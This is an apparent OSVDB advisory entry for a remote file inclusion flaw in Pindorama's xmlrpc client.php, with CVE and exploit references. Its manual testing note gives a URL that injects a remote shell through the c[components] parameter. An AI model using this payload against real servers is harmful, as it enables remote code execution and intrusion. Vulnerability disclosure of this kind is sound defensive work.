Pindorama client.php c[components] Variable Remote File Inclusion

2007-10-11T00:00:00
ID OSVDB:37879
Type osvdb
Reporter OSVDB
Modified 2007-10-11T00:00:00

Description

Manual Testing Notes

http://[TARGET]/[PATH]/active/components/xmlrpc/client.php?c[components]=[-Sh3ll-]

References:

ISS X-Force ID: 37179 Generic Exploit URL: http://www.milw0rm.com/exploits/4519 CVE-2007-5387 Bugtraq ID: 26026